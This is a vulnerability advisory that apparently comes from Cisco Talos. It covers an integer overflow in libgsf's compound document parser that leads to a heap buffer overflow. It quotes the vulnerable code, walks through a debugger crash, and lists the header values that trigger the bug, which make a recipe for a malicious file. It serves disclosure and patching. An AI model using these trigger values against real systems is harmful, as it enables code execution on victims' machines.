Talos Vulnerability Report

TALOS-2024-2069

GNOME Project G Structured File Library (libgsf) Compound Document Binary File Sector Allocation Table integer overflow vulnerability

October 3, 2024
CVE Number

CVE-2024-42415

SUMMARY

An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

GNOME Project G Structured File Library (libgsf) 1.14.52
GNOME Project G Structured File Library (libgsf) commit 634340d31177c02ccdb43171e37291948e7f8974

PRODUCT URLS

G Structured File Library (libgsf) - https://gitlab.gnome.org/GNOME/libgsf.git

CVSSv3 SCORE

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-190 - Integer Overflow or Wraparound

DETAILS

The G Structured File Library (libgsf) is a GNOME project with the goals of providing an abstraction layer around different structured file formats. This library provides support for common archive formats such as tar, zip, and includes other formats such as the compound document file format. The G Structured File Library (libgsf) is used by a number of applications in order to extract data from the supported formats. Some applications that use this library are Gnumeric, GNOME Commander, AbiWord, and the tracker-miners service. Tracker-miner service is specifically important, as it will automatically index and parse all files found under user’s home directory without user interaction.

This vulnerability specifically involves the way the G Structured File Library (libgsf) parses the compound document binary file format. The format is designed as a container that can be used to store multiple streams of information, similar to an archive. Within the container, a directory retaining naming information for the contents of each document component is stored in order to allow for identification of the streams that it contains. This design allows for a writer of said format to manipulate the different streams individually without interfering with other applications that may be accessing the same file. This capability is facilitated by the format organizing its contents using a file allocation table and a layer of indirection to reference said allocation table. Within the file allocation table is a linked-list describing which sectors are contiguous, thus each directory entry will reference its contents by specifying which sector in the file allocation table to start at. It is also worth noting that there are two types of sectors within the file format, with their sizes residing in the document header. For more information on this file format, please review Microsoft’s documentation at https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cfb/53989ce4-7b05-4f8d-829b-d08d6148375b.

After a consumer of the libgsf library has opened a file using the compound document binary file format, the gsf_infile_msole_new function will be used as an entry point to parse the file’s contents. This function allocates a GsfInfileMSOle structure to contain the information necessary to parse the compound document file. At [1], the ole_init_info function will be called to read the header for the file format.

gsf/gsf-infile-msole.c:971-993
GsfInfile *
gsf_infile_msole_new (GsfInput *source, GError **err)
{
    GsfInfileMSOle *ole;
    gsf_off_t calling_pos;

    g_return_val_if_fail (GSF_IS_INPUT (source), NULL);

    ole = (GsfInfileMSOle *)g_object_new (GSF_INFILE_MSOLE_TYPE, NULL);
    ole->input = gsf_input_proxy_new (source);
    gsf_input_set_size (GSF_INPUT (ole), 0);

    calling_pos = gsf_input_tell (source);
    if (ole_init_info (ole, err)) {                                     // [1] Initialize tables to parse file
        /* We do this so other kinds of archives can be tried.  */
        (void)gsf_input_seek (source, calling_pos, G_SEEK_SET);

        g_object_unref (ole);
        return NULL;
    }

    return GSF_INFILE (ole);
}

Once inside the ole_init_info function, the implementation will start by verifying the signature of the file at [2]. Afterwards at [3], each of the fields composing the header are loaded into variables local to the function’s scope. As mentioned earlier, the compound document binary file format stores its sector sizes within the header. These sizes are stored as a power of 2 (or “shift”). After reading the sector sizes, at [4] the function will verify that their sizes are within a specific range (64 - 1073741824). However, as per Microsoft’s documentation, the file sector shift can be either 9 (512) or 12 (4096) depending on the major version in the header.

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
    static guint8 const signature[] =
        { 0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1 };
    guint8 *seen_before;
    guint8 const *header, *tmp;
    guint32 *metabat = NULL;
    MSOleInfo *info;
    guint32 bb_shift, sb_shift, num_bat, num_sbat, num_metabat, threshold, last, dirent_start;
    guint32 metabat_block, *ptr;
    gboolean fail;

    /* check the header */
    if (gsf_input_seek (ole->input, 0, G_SEEK_SET) ||                           
        NULL == (header = gsf_input_read (ole->input, OLE_HEADER_SIZE, NULL)) ||    // [2] Check the signature in the header
        0 != memcmp (header, signature, sizeof (signature))) {
...
    }

    bb_shift      = GSF_LE_GET_GUINT16 (header + OLE_HEADER_BB_SHIFT);              // [3] Read the sector shift (sector size)
    sb_shift      = GSF_LE_GET_GUINT16 (header + OLE_HEADER_SB_SHIFT);              // [3] Read the minisector shift (minisector size)
    num_bat	      = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_BAT);               // [3] Read the number of sectors for the file allocation table
    num_sbat      = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_SBAT);              // [3] Read the number of sectors for the mini file allocation table
    threshold     = GSF_LE_GET_GUINT32 (header + OLE_HEADER_THRESHOLD);             // [3] Read the stream threshold (mini)
    dirent_start  = GSF_LE_GET_GUINT32 (header + OLE_HEADER_DIRENT_START);          // [3] Read the starting sector of the directory
        metabat_block = GSF_LE_GET_GUINT32 (header + OLE_HEADER_METABAT_BLOCK);     // [3] Read the starting sector containing the indirection table
    num_metabat   = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_METABAT);           // [3] Read the number of sectors containing the indirection table
...
    /* Some sanity checks
     * 1) There should always be at least 1 BAT block
     * 2) It makes no sense to have a block larger than 2^31 for now.
     *    Maybe relax this later, but not much.
     */
    if (6 > bb_shift || bb_shift >= 31 || sb_shift > bb_shift ||                    // [4] Validate the sector sizes
        (gsf_input_size (ole->input) >> bb_shift) < 1) {                            // [4] Validate the sector sizes
        if (err != NULL)
            *err = g_error_new (gsf_input_error_id (), 0,
                        _("Unreasonable block sizes"));
        return TRUE;
    }
...
    return FALSE;
}

Once the fields have been read from the header and the sector sizes validated, the function will allocate space for the info local variable. After being allocated, the implementation will store the fields required to read the indirection table and its file allocation table. At [5], the function will use the sector “shift” read from the header to calculate the size of an individual sector, and store it into the info variable. The vulnerability being described specifically involves this sector size. At [6], the same calculation will be made with the minisector “shift” before storing it to the corresponding field of the info variable. At [7], the fields containing the dimensions of the minisector file allocation table will also be stored to info.

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
...
    MSOleInfo *info;
...
    info = g_new0 (MSOleInfo, 1);
    ole->info = info;

    info->ref_count	     = 1;
    info->bb.shift	     = bb_shift;                                                                            // [5] Store sector "shift"
    info->bb.size	     = 1 << info->bb.shift;                                                                 // [5] Convert sector shift to size
    info->bb.filter	     = info->bb.size - 1;
    info->sb.shift	     = sb_shift;                                                                            // [6] Store minisector "shift"
    info->sb.size	     = 1 << info->sb.shift;                                                                 // [6] Convert minisector shift to size
    info->sb.filter	     = info->sb.size - 1;
    info->threshold	     = threshold;
        info->sbat_start     = GSF_LE_GET_GUINT32 (header + OLE_HEADER_SBAT_START);                             // [7] Start of minisector fat
    info->num_sbat       = num_sbat;                                                                            // [7] Number of sectors for minisector fat
    info->max_block	     = (gsf_input_size (ole->input) - OLE_HEADER_SIZE + info->bb.size -1) / info->bb.size;
    info->sb_file	     = NULL;

...
    return FALSE;
}

After the info field has been populated by the ole_init_info function, the following code will be encountered. At [8], the ole_init_info function will start by validating the number of sectors for the file allocation table against the size of the file. Afterwards, the file allocation table will need to be allocated in order to store the sectors indices that compose it. This is done at [9] by taking the sector size and dividing it by the size of an entry (4). Afterwards, it is then multiplied by the number of sectors that was read from the header, and then used to perform an allocation at [10]. Due to the info->bb.bat.num_blocks field being of type guint32, the multiplication at [9] can be made to overflow resulting in the allocation at [10] being undersized. After allocating space for the file allocation table, the address of the allocated memory will be passed to ole_info_read_metabat at [11].

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
...
    guint32 *metabat = NULL;
    MSOleInfo *info;
    guint32 bb_shift, sb_shift, num_bat, num_sbat, num_metabat, threshold, last, dirent_start;
    guint32 metabat_block, *ptr;
...

    /* very rough heuristic, just in case */
    if (num_bat < info->max_block && info->num_sbat < info->max_block) {            // [8] Check number of sectors (regular and mini) against file
        info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);       // [9] Multiply number of sectors by sector size
        info->bb.bat.block	= g_new0 (guint32, info->bb.bat.num_blocks);            // [10] Allocate entries for file allocation table

        metabat = g_try_new (guint32, MAX (info->bb.size, OLE_HEADER_SIZE));
        if (!metabat) {
...
        }

        /* Reading the elements invalidates this memory, make copy */
        gsf_ole_get_guint32s (metabat, header + OLE_HEADER_START_BAT,
            OLE_HEADER_SIZE - OLE_HEADER_START_BAT);
        last = num_bat;
        if (last > OLE_HEADER_METABAT_SIZE)
            last = OLE_HEADER_METABAT_SIZE;

        ptr = ole_info_read_metabat (ole, info->bb.bat.block,                       // [11] Read sectors from indirection table into undersized buffer.
            info->bb.bat.num_blocks, metabat, metabat + last);
        num_bat -= last;
    } else
        ptr = NULL;

...
    return FALSE;
}

The following is the implementation of the ole_info_read_metabat function. When using the libgsf library to open the provided proof-of-concept, the bats parameter should be undersized. At [12], the function will enter a loop that uses the indirection table to locate each sector that composes the file allocation table. Afterwards, the sector is read and then processed to copy each individual entry into the undersized bats parameter for each iteration of the loop at [13]. Due to the memory for the file allocation table being undersized, this will result in a heap-based buffer overflow. In certain conditions, this can result in code execution within the context of the application using the library.

gsf/gsf-infile-msole.c:201-232
static guint32 *
ole_info_read_metabat (GsfInfileMSOle *ole, guint32 *bats, guint32 max_bat,
               guint32 const *metabat, guint32 const *metabat_end)
{
    guint8 const *bat, *end;

    for (; metabat < metabat_end; metabat++) {                          // [12] Enter loop to read the indirection table
        if (*metabat != BAT_MAGIC_UNUSED) {
            bat = ole_get_block (ole, *metabat, NULL);
...
            end = bat + ole->info->bb.size;
            for ( ; bat < end ; bat += BAT_INDEX_SIZE, bats++) {
                *bats = GSF_LE_GET_GUINT32 (bat);                       // [13]
...
            }
        } else {
            /* Looks like something in the wild sometimes creates
             * 'unused' entries in the metabat.  Let's assume that
             * corresponds to lots of unused blocks
             * http://bugzilla.gnome.org/show_bug.cgi?id=336858 */
            unsigned i = ole->info->bb.size / BAT_INDEX_SIZE;
            while (i-- > 0)
                *bats++ = BAT_MAGIC_UNUSED;                             // [13]
        }
    }
    return bats;
}

Crash Information

The following excerpt uses the gdb(1) debugger to debug the tools/gsf binary that comes with libgsf. After the debugger has loaded, a temporary breakpoint is set on the “main” function.

$ gdb -q --args ./gsf list filename
Catchpoint 1 (exec)
Catchpoint 2 (fork)
Catchpoint 3 (vfork)
No symbol table is loaded.  Use the "file" command.
Make breakpoint pending on future shared library load? (y or [n]) [answered N; input not from terminal]
Reading symbols from ./gsf...

(gdb) tbreak main
Temporary breakpoint 4 at 0x402470: file gsf.c, line 518.

(gdb) r
Starting program: /tracker-miners/libgsf/tools/.libs/gsf list filename
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Temporary breakpoint 4, main (argc=0x3, argv=0x7fffffffcff8) at gsf.c:518
518             GError *error = NULL;
Missing separate debuginfos, use: dnf debuginfo-install bzip2-libs-1.0.8-18.fc40.x86_64 libblkid-2.40.1-1.fc40.x86_64 libffi-3.4.4-7.fc40.x86_64 libmount-2.40.1-1.fc40.x86_64 libselinux-3.6-4.fc40.x86_64 libxml2-2.12.8-1.fc40.x86_64 pcre2-10.44-1.fc40.x86_64 xz-libs-5.4.6-3.fc40.x86_64 zlib-ng-compat-2.1.7-1.fc40.x86_64

When the debugger resumes control, two breakpoints are set before continuing execution of the target process. The first breakpoint is on the line number containing the integer overflow. The second breakpoint is on the line number of the function that will write to the undersized array.

(gdb) b gsf/gsf-infile-msole.c:571
Breakpoint 5 at 0x1555554f1e52: file gsf-infile-msole.c, line 571.
(gdb) b gsf/gsf-infile-msole.c:590
Breakpoint 6 at 0x1555554f1fee: file gsf-infile-msole.c, line 590.
(gdb) c
Continuing.

Upon resuming execution, the first breakpoint should be encountered. The next three instructions are responsible for calculating the product of the number of sectors with the number of entries that are specified in the header. Printing out the contents of address being loaded from the first operand results in the size 0x800000 being displayed. After stepping over the current instruction, this value will be stored to the %rdi register.

Breakpoint 5, ole_init_info (ole=0x41a870 [GsfInfileMSOle], err=0x0) at gsf-infile-msole.c:571
571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) x/3i $pc
=> 0x1555554f1e52 <gsf_infile_msole_new+882>:   mov    0x18(%r8),%rdi
   0x1555554f1e56 <gsf_infile_msole_new+886>:   shr    $0x2,%rdi
   0x1555554f1e5a <gsf_infile_msole_new+890>:   imul   %r13d,%edi

(gdb) dd $r8+0x18 L1
41a958 | 00800000 | ....

(gdb) stepi
0x00001555554f1e56      571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) p $rdi
$1 = 0x800000

The next instruction uses the shr instruction to divide by 4. By stepping over this instruction, the value stored in the %rdi register will be divided, resulting in 0x200000. The signed multiplication instruction that is responsible for the integer overflow is next. This instruction calculates the product of the %r13d and %edi registers before storing the result in the %eax register. We can do some quick math to show that the multiplication will result in an integer that is clamped to 32-bits.

(gdb) stepi
0x00001555554f1e5a      571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) p $rdi
$2 = 0x200000

(gdb) p $r13d
$4 = 0x801

(gdb) p $r13d*$edi
$5 = 0x200000

(gdb) p (uint64_t)$r13d*$edi
$6 = 0x100200000

(gdb) next
572                     info->bb.bat.block      = g_new0 (guint32, info->bb.bat.num_blocks);

After the multiplication has been executed, we will see the result being used as a parameter to the g_new0 function for allocating memory. After executing the g_new0 function, the address returned by g_new0 will be stored in the %rax register. Afterwards, we resume execution until we encounter the next breakpoint which is where the library will write to the memory that was just allocated.

(gdb) p $rax
$9 = 0x155546600010

(gdb) next                                                                                
574                     metabat = g_try_new (guint32, MAX (info->bb.size, OLE_HEADER_SIZE));                                                                                         The next time the debugger returns control to us, we will be at the entrypoint of the `ole_info_read_metabat` function. If we step into this, we can see that the "bats" parameter contains the address of the undersized array that was allocated. At this point we can continue the program and wait for the `ole_info_read_metabat` function to initialize the memory contents pointed to by the "bats" parameter.

(gdb) c                                                                                   
Continuing.                                                                               
                                                                                          
Breakpoint 6, ole_init_info (ole=0x41a870 [GsfInfileMSOle], err=0x0) at gsf-infile-msole.c:590
590                     ptr = ole_info_read_metabat (ole, info->bb.bat.block,

(gdb) step
ole_info_read_metabat (ole=ole@entry=0x41a870 [GsfInfileMSOle], bats=0x155546600010, max_bat=0x200000, metabat=metabat@entry=0x155544400010, metabat_end=0x1555444001c4)
    at gsf-infile-msole.c:207
207             for (; metabat < metabat_end; metabat++) {

Immediately after continuing execution, the ole_info_read_metabat function will write data from the file into the undersized “bats” array. This will result in signal 11 being dispatched to the process, which manifests itself as a SIGSEGV segmentation fault.

(gdb) finish
Run till exit from #0  ole_info_read_metabat (ole=ole@entry=0x41a870 [GsfInfileMSOle], bats=0x155546600010, max_bat=0x200000, metabat=metabat@entry=0x155544400010, 
    metabat_end=0x1555444001c4) at gsf-infile-msole.c:207

Program received signal SIGSEGV, Segmentation fault.
__memset_avx2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:330
330             rep     stosb

(gdb) h

-=[registers]=-
[rax: 0x00000000000000ff] [rbx: 0x00001555444001c4] [rcx: 0x00000000007ff010]
[rdx: 0x0000155546e00010] [rsi: 0x00000000000000ff] [rdi: 0x0000155546e01000]
[rsp: 0x00007fffffffcd88] [rbp: 0x0000000000200000] [ pc: 0x0000155554f19bca]
[ r8: 0x00001555444001c4] [ r9: 0x00000000ffffffff] [r10: 0x0000000000000000]
[r11: 0x0000155554f19b00] [r12: 0x000000000041a870] [r13: 0x0000000000800000]
[r14: 0x0000155544400014] [r15: 0x0000155546e00010] [efl: 0x00010206]
warning: right shift count >= width of type
[flags: -ZF -SF -OF -CF -DF +PF -AF +IF RF R1]

-=[stack]=-
7fffffffcd88 | 00001555554f2ecf 000000000040ea3c | ..OUU...<.@.....
7fffffffcd98 | 0000000000417c70 0000000000000801 | p|A.............
7fffffffcda8 | 0000155544400010 0000000000000000 | ..@DU...........
7fffffffcdb8 | 000000000041a870 000000000000006d | p.A.....m.......

-=[disassembly]=-
   0x155554f19bc0 <__memset_avx2_unaligned_erms+192>:   movzbl %sil,%eax
   0x155554f19bc4 <__memset_avx2_unaligned_erms+196>:   mov    %rdx,%rcx
   0x155554f19bc7 <__memset_avx2_unaligned_erms+199>:   mov    %rdi,%rdx
=> 0x155554f19bca <__memset_avx2_unaligned_erms+202>:   rep stos %al,%es:(%rdi)
   0x155554f19bcc <__memset_avx2_unaligned_erms+204>:   mov    %rdx,%rax
   0x155554f19bcf <__memset_avx2_unaligned_erms+207>:   vzeroupper
   0x155554f19bd2 <__memset_avx2_unaligned_erms+210>:   ret

Exploit Proof of Concept

To create the malformed file, run the proof-of-concept with python and your desired document filename. After the document has been created, it is ready to be parsed. The generated file can then be opened with the library using either the gsf tool, or by expliciting using the gsf_infile_msole_new function.

$ python poc.py3.zip somefilename
...
$ stat somefilename

The first sector (0x200 bytes) of the generated file contains the entirety of the header for the compound document. Within the header, two fields are multiplied in order to produce the mentioned integer overflow.

<class storage.File> 'unnamed_14f9133a2630' {unnamed=True}
[0] <instance storage.Header 'Header'> (little) 0xd0cf11e0a1b11ae1 version=3.62 clsid={00000000-0000-0000-0000-000000000000}
[1e] <instance storage.HeaderSectorShift 'SectorShift'> uSectorShift=16 (0x10000) uMiniSectorShift=8 (0x100)
[22] <instance ptype.block 'reserved'> (6) "\x00\x00\x00\x00\x00\x00"
[28] <instance storage.HeaderFat 'Fat'> sectDirectory=ENDOFCHAIN(0xfffffffe) csectDirectory=0 csectFat=262145 dwTransaction=0x00000000
[38] <instance storage.HeaderMiniFat 'MiniFat'> ulMiniSectorCutoff=4096 sectMiniFat=ENDOFCHAIN(0xfffffffe) csectMiniFat=0
[44] <instance storage.HeaderDiFat 'DiFat'> sectDifat=ENDOFCHAIN(0xfffffffe) csectDifat=0
[4c] <instance storage.DIFAT 'Table'> storage.DIFAT.IndirectPointer[109] .............................................................................................................
[200] <instance ptype.block 'padding(Table)'> ...
[200] <instance FileSectors 'Data'> _object_[0] ""

At offset 0x1e of the file is the sector “shift”. The sector “shift” is a power of 2 and is used to determine the size of an individual sector. The library allows the range of this value to be from 6 to 30, resulting in a sector size from 0x40 to 0x40000000 (respectively).

<class storage.HeaderSectorShift> 'SectorShift'
[1e] <instance storage.USHORT 'uSectorShift'> 0x0010 (16)
[20] <instance storage.USHORT 'uMiniSectorShift'> 0x0008 (8)

At offset 0x2c of the file is the number of sectors used to compose the file allocation table.

<class storage.HeaderFat> 'Fat'
[28] <instance storage.DWORD 'csectDirectory'> 0x00000000 (0)
[2c] <instance storage.DWORD 'csectFat'> 0x00040001 (262145)
[30] <instance storage.SECT(Pointer._object_, SECT._calculate_) 'sectDirectory'> ENDOFCHAIN(0xfffffffe)
[34] <instance storage.DWORD 'dwTransaction'> 0x00000000 (0)

If the product of the sector size from offset 0x1e and the number of sectors at offset 0x2c is larger than 32-bits, then this vulnerability is being triggered.

VENDOR RESPONSE

Fixed in 1.14.53

TIMELINE

2024-09-03 - Vendor Disclosure
2024-09-03 - Initial Vendor Contact
2024-10-01 - Vendor Patch Release
2024-10-03 - Public Release

Credit

Discovered by a member of Cisco Talos.